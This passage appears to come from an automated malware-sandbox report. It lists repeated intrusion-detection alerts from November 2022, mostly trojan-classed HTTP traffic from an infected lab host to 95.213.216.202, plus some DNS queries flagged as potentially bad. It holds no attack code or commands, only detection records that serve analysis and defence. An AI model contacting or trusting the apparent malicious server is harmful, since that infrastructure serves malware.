            Destination Port:49705
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.853975532014169 11/30/22-00:54:22.160619
            SID:2014169
            Source Port:53975
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249753802025381 11/30/22-00:55:51.242717
            SID:2025381
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249757802021641 11/30/22-00:55:58.948901
            SID:2021641
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249716802021641 11/30/22-00:54:43.829219
            SID:2021641
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249739802024318 11/30/22-00:55:25.267085
            SID:2024318
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249741802825766 11/30/22-00:55:29.247109
            SID:2825766
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249700802825766 11/30/22-00:54:09.487691
            SID:2825766
            Source Port:49700
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249720802024313 11/30/22-00:54:51.608521
            SID:2024313
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249708802024318 11/30/22-00:54:26.803652
            SID:2024318
            Source Port:49708
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497482025483 11/30/22-00:55:43.661913
            SID:2025483
            Source Port:80
            Destination Port:49748
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249731802825766 11/30/22-00:55:10.632751
            SID:2825766
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249702802024313 11/30/22-00:54:14.871390
            SID:2024313
            Source Port:49702
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249720802024318 11/30/22-00:54:51.608521
            SID:2024318
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249737802825766 11/30/22-00:55:21.614296
            SID:2825766
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249702802024318 11/30/22-00:54:14.871390
            SID:2024318
            Source Port:49702
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249719802825766 11/30/22-00:54:49.641508
            SID:2825766
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.863446532014169 11/30/22-00:55:43.898414
            SID:2014169
            Source Port:63446
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:95.213.216.202192.168.2.380497092025483 11/30/22-00:54:30.691043
            SID:2025483
            Source Port:80
            Destination Port:49709
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497432025483 11/30/22-00:55:34.122250
            SID:2025483
            Source Port:80
            Destination Port:49743
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249708802024313 11/30/22-00:54:26.803652
            SID:2024313
            Source Port:49708
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.858119532014169 11/30/22-00:55:38.197046
            SID:2014169
            Source Port:58119
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.38.8.8.857990532014169 11/30/22-00:54:11.706174
            SID:2014169
            Source Port:57990
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249759802024318 11/30/22-00:56:01.042444
            SID:2024318
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249709802825766 11/30/22-00:54:29.164231
            SID:2825766
            Source Port:49709
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249730802024313 11/30/22-00:55:08.823725
            SID:2024313
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249745802025381 11/30/22-00:55:36.377571
            SID:2025381
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249724802021641 11/30/22-00:54:58.184483
            SID:2021641
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249759802024313 11/30/22-00:56:01.042444
            SID:2024313
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249703802825766 11/30/22-00:54:16.960834
            SID:2825766
            Source Port:49703
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249704802025381 11/30/22-00:54:18.966132
            SID:2025381
            Source Port:49704
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497152025483 11/30/22-00:54:43.541337
            SID:2025483
            Source Port:80
            Destination Port:49715
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249730802024318 11/30/22-00:55:08.823725
            SID:2024318
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249718802024318 11/30/22-00:54:47.592007
            SID:2024318
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.864121532014169 11/30/22-00:55:57.444180
            SID:2014169
            Source Port:64121
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249719802021641 11/30/22-00:54:49.641508
            SID:2021641
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249721802825766 11/30/22-00:54:53.572062
            SID:2825766
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497042025483 11/30/22-00:54:19.714505
            SID:2025483
            Source Port:80
            Destination Port:49704
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249747802021641 11/30/22-00:55:40.214633
            SID:2021641
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.849874532014169 11/30/22-00:55:45.675021
            SID:2014169
            Source Port:49874
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249722802025381 11/30/22-00:54:54.732179
            SID:2025381
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249718802024313 11/30/22-00:54:47.592007
            SID:2024313
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.853428532014169 11/30/22-00:55:25.189214
            SID:2014169
            Source Port:53428
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249736802024318 11/30/22-00:55:19.643476
            SID:2024318
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249736802024313 11/30/22-00:55:19.643476
            SID:2024313
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249732802025381 11/30/22-00:55:12.457821
            SID:2025381
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497592025483 11/30/22-00:56:01.793951
            SID:2025483
            Source Port:80
            Destination Port:49759
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249746802024318 11/30/22-00:55:38.275174
            SID:2024318
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249749802024318 11/30/22-00:55:43.976237
            SID:2024318
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249737802021641 11/30/22-00:55:21.614296
            SID:2021641
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249746802024313 11/30/22-00:55:38.275174
            SID:2024313
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497542025483 11/30/22-00:55:55.161061
            SID:2025483
            Source Port:80
            Destination Port:49754
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249735802025381 11/30/22-00:55:17.863854
            SID:2025381
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249706802021641 11/30/22-00:54:22.484255
            SID:2021641
            Source Port:49706
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249734802021641 11/30/22-00:55:16.065951
            SID:2021641
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249699802825766 11/30/22-00:54:07.324934
            SID:2825766
            Source Port:49699
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497322025483 11/30/22-00:55:13.950022
            SID:2025483
            Source Port:80
            Destination Port:49732
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497372025483 11/30/22-00:55:23.147009
            SID:2025483
            Source Port:80
            Destination Port:49737
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249749802024313 11/30/22-00:55:43.976237
            SID:2024313
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249748802025381 11/30/22-00:55:42.098367
            SID:2025381
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497212025483 11/30/22-00:54:54.418787
            SID:2025483
            Source Port:80
            Destination Port:49721
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497102025483 11/30/22-00:54:33.459515
            SID:2025483
            Source Port:80
            Destination Port:49710
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249733802024313 11/30/22-00:55:14.244291
            SID:2024313
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249707802025381 11/30/22-00:54:24.716724
            SID:2025381
            Source Port:49707
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249733802024318 11/30/22-00:55:14.244291
            SID:2024318
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.851139532014169 11/30/22-00:54:24.370686
            SID:2014169
            Source Port:51139
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249721802021641 11/30/22-00:54:53.572062
            SID:2021641
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249747802825766 11/30/22-00:55:40.214633
            SID:2825766
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249706802825766 11/30/22-00:54:22.484255
            SID:2825766
            Source Port:49706
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249709802021641 11/30/22-00:54:29.164231
            SID:2021641
            Source Port:49709
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.855638532014169 11/30/22-00:54:39.891168
            SID:2014169
            Source Port:55638
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.38.8.8.853466532014169 11/30/22-00:55:06.970990
            SID:2014169
            Source Port:53466
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249717802021641 11/30/22-00:54:45.540558
            SID:2021641
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.864823532014169 11/30/22-00:55:34.318234
            SID:2014169
            Source Port:64823
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249706802025381 11/30/22-00:54:22.484255
            SID:2025381
            Source Port:49706
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249716802825766 11/30/22-00:54:43.829219
            SID:2825766
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249720802021641 11/30/22-00:54:51.608521
            SID:2021641
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.865017532014169 11/30/22-00:55:05.186135
            SID:2014169
            Source Port:65017
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249734802025381 11/30/22-00:55:16.065951
            SID:2025381
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249723802024318 11/30/22-00:54:56.463103
            SID:2024318
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.864602532014169 11/30/22-00:55:53.393350
            SID:2014169
            Source Port:64602
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:95.213.216.202192.168.2.380497252025483 11/30/22-00:55:01.390776
            SID:2025483
            Source Port:80
            Destination Port:49725
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497292025483 11/30/22-00:55:08.539654
            SID:2025483
            Source Port:80
            Destination Port:49729
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249723802024313 11/30/22-00:54:56.463103
            SID:2024313
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.853848532014169 11/30/22-00:54:49.539403
            SID:2014169
            Source Port:53848
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249744802825766 11/30/22-00:55:34.401351
            SID:2825766
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.865107532014169 11/30/22-00:54:47.470066
            SID:2014169
            Source Port:65107
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249739802025381 11/30/22-00:55:25.267085
            SID:2025381
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249712802021641 11/30/22-00:54:35.972913
            SID:2021641
            Source Port:49712
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249753802021641 11/30/22-00:55:51.242717
            SID:2021641
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249725802021641 11/30/22-00:54:59.930841
            SID:2021641
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249748802024318 11/30/22-00:55:42.098367
            SID:2024318
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249731802024313 11/30/22-00:55:10.632751
            SID:2024313
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249748802024313 11/30/22-00:55:42.098367
            SID:2024313
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.865196532014169 11/30/22-00:55:14.166464
            SID:2014169
            Source Port:65196
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249731802024318 11/30/22-00:55:10.632751
            SID:2024318
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249708802825766 11/30/22-00:54:26.803652
            SID:2825766
            Source Port:49708
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249749802825766 11/30/22-00:55:43.976237
            SID:2825766
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249743802024313 11/30/22-00:55:32.962709
            SID:2024313
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249757802825766 11/30/22-00:55:58.948901
            SID:2825766
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249743802024318 11/30/22-00:55:32.962709
            SID:2024318
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249728802024318 11/30/22-00:55:05.285201
            SID:2024318
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249750802025381 11/30/22-00:55:45.758418
            SID:2025381
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249700802021641 11/30/22-00:54:09.487691
            SID:2021641
            Source Port:49700
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249728802024313 11/30/22-00:55:05.285201
            SID:2024313
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249714802025381 11/30/22-00:54:39.977728
            SID:2025381
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249724802825766 11/30/22-00:54:58.184483
            SID:2825766
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249719802025381 11/30/22-00:54:49.641508
            SID:2025381
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249756802024318 11/30/22-00:55:57.533680
            SID:2024318
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249742802025381 11/30/22-00:55:31.101064
            SID:2025381
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249733802021641 11/30/22-00:55:14.244291
            SID:2021641
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249729802825766 11/30/22-00:55:07.068054
            SID:2825766
            Source Port:49729
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.857704532014169 11/30/22-00:54:41.979608
            SID:2014169
            Source Port:57704
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249715802024318 11/30/22-00:54:42.060768
            SID:2024318
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249752802825766 11/30/22-00:55:49.378987
            SID:2825766
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249756802024313 11/30/22-00:55:57.533680
            SID:2024313
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249715802024313 11/30/22-00:54:42.060768
            SID:2024313
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249751802024313 11/30/22-00:55:47.279515
            SID:2024313
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249711802825766 11/30/22-00:54:33.859062
            SID:2825766
            Source Port:49711
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249751802024318 11/30/22-00:55:47.279515
            SID:2024318
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249710802024318 11/30/22-00:54:31.910937
            SID:2024318
            Source Port:49710
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249710802024313 11/30/22-00:54:31.910937
            SID:2024313
            Source Port:49710
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249747802025381 11/30/22-00:55:40.214633
            SID:2025381
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249701802025381 11/30/22-00:54:12.581436
            SID:2025381
            Source Port:49701
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249755802025381 11/30/22-00:55:55.653974
            SID:2025381
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249729802021641 11/30/22-00:55:07.068054
            SID:2021641
            Source Port:49729
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497442025483 11/30/22-00:55:36.086250
            SID:2025483
            Source Port:80
            Destination Port:49744
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249735802024318 11/30/22-00:55:17.863854
            SID:2024318
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.853049532014169 11/30/22-00:55:19.563471
            SID:2014169
            Source Port:53049
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249735802024313 11/30/22-00:55:17.863854
            SID:2024313
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249744802024313 11/30/22-00:55:34.401351
            SID:2024313
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497472025483 11/30/22-00:55:41.771804
            SID:2025483
            Source Port:80
            Destination Port:49747
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249744802024318 11/30/22-00:55:34.401351
            SID:2024318
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249741802021641 11/30/22-00:55:29.247109
            SID:2021641
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249704802825766 11/30/22-00:54:18.966132
            SID:2825766
            Source Port:49704
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249746802025381 11/30/22-00:55:38.275174
            SID:2025381
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249732802021641 11/30/22-00:55:12.457821
            SID:2021641
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249699802024312 11/30/22-00:54:07.324934
            SID:2024312
            Source Port:49699
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249707802024313 11/30/22-00:54:24.716724
            SID:2024313
            Source Port:49707
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497062025483 11/30/22-00:54:24.053489
            SID:2025483
            Source Port:80
            Destination Port:49706
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497502025483 11/30/22-00:55:46.963833
            SID:2025483
            Source Port:80
            Destination Port:49750
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249699802024317 11/30/22-00:54:07.324934
            SID:2024317
            Source Port:49699
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249727802025381 11/30/22-00:55:03.486766
            SID:2025381
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.865511532014169 11/30/22-00:55:27.103034
            SID:2014169
            Source Port:65511
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.38.8.8.864967532014169 11/30/22-00:55:58.869049
            SID:2014169
            Source Port:64967
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249721802025381 11/30/22-00:54:53.572062
            SID:2025381
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249707802024318 11/30/22-00:54:24.716724
            SID:2024318
            Source Port:49707
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249713802021641 11/30/22-00:54:37.979213
            SID:2021641
            Source Port:49713
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249732802825766 11/30/22-00:55:12.457821
            SID:2825766
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249751802825766 11/30/22-00:55:47.279515
            SID:2825766
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497552025483 11/30/22-00:55:57.270722
            SID:2025483
            Source Port:80
            Destination Port:49755
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497582025483 11/30/22-00:56:00.797031
            SID:2025483
            Source Port:80
            Destination Port:49758
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497362025483 11/30/22-00:55:21.118367
            SID:2025483
            Source Port:80
            Destination Port:49736
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249703802024318 11/30/22-00:54:16.960834
            SID:2024318
            Source Port:49703
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249702802025381 11/30/22-00:54:14.871390
            SID:2025381
            Source Port:49702
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249703802024313 11/30/22-00:54:16.960834
            SID:2024313
            Source Port:49703
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.857134532014169 11/30/22-00:54:31.820802
            SID:2014169
            Source Port:57134
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249758802021641 11/30/22-00:56:00.034214
            SID:2021641
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.858691532014169 11/30/22-00:54:53.455722
            SID:2014169
            Source Port:58691
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249736802825766 11/30/22-00:55:19.643476
            SID:2825766
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
